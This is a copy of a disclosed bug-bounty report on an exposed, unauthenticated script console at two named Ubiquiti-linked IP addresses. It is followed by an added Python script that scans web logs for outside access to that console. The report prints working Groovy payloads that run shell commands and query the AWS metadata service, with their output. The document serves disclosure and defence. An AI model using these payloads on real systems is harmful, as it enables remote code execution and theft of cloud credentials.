forked from aldaor/HackerOneReports
403402.txt
ReportLink:https://hackerone.com/reports/403402
WeaknessName:Code Injection
Reporter:https://hackerone.com/smiegles
ReportedTo:Ubiquiti Networks(ubnt)
BountyAmount:2500.0
Severity:critical
State:Closed
DateOfDisclosure:10.09.2018 16:21:17
Summary:
Hi,
First of all, I'm not 100% able to verify that this server is actually owned by Ubnt, as there are multiple DNS names in the SSL certificate.
```
DNS Name: *.uum.com
DNS Name: *.ubnt.com
DNS Name: *.svc.ubnt.com
DNS Name: *.api.uum.com
DNS Name: *.svc.uum.com
DNS Name: uum.com
```
So, the server hosted on https://54.191.232.223/ and https://54.186.253.37/ is reachable from the internet and has the script console enabled.
You can execute code on it by going to https://54.186.253.37/script and inserting the following code:
```
"ls /".execute().text
```
__Result__
```
Result: bin
boot
dev
docker-java-home
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
```
It also allows reaching the AWS metadata server:
```
"curl http://169.254.169.254/latest/meta-data/".execute().text
```
__Result__
```
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
```
## Impact
RCE
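
For defenders, exposure of the kind described in this report can be checked for in web access logs. The following is an added example, not part of the original report: it flags requests to the `/script` path that come from outside an administrative network. The combined log format, the `ADMIN_NETS` range and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Assumption: networks allowed to reach the console (e.g. an admin VPN).
ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/16")]
CONSOLE_PATH = "/script"  # path named in the report

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)

def classify(line):
    """Return None, or (verdict, ip, method, status) for a console request."""
    m = LINE_RE.match(line)
    if not m:
        return None  # malformed line
    # Drop the query string and trailing slash so /script/?x=1 still matches.
    path = urlsplit(m["target"]).path.rstrip("/") or "/"
    if path != CONSOLE_PATH:
        return None
    try:
        ip = ipaddress.ip_address(m["ip"])
    except ValueError:
        return None
    if any(ip in net for net in ADMIN_NETS):
        return None  # expected administrative access
    status = int(m["status"])
    # 2xx to an outside client with no authenticated user: console served openly.
    exposed = 200 <= status < 300 and m["user"] == "-"
    return ("EXPOSED" if exposed else "PROBE", str(ip), m["method"], status)

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '10.20.4.9 - admin [01/Jan/2024:10:00:01 +0000] "GET /script HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:02:11 +0000] "GET /script HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:02:40 +0000] "POST /script HTTP/1.1" 200 6011',
    '198.51.100.23 - - [01/Jan/2024:10:05:00 +0000] "GET /script/ HTTP/1.1" 403 312',
    '198.51.100.23 - - [01/Jan/2024:10:05:02 +0000] "GET /scripts/app.js HTTP/1.1" 200 900',
    'not an access log line',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

An `EXPOSED` verdict means the console answered an unauthenticated outside client with a success status, which is the condition the report describes; `PROBE` means the request was refused or redirected.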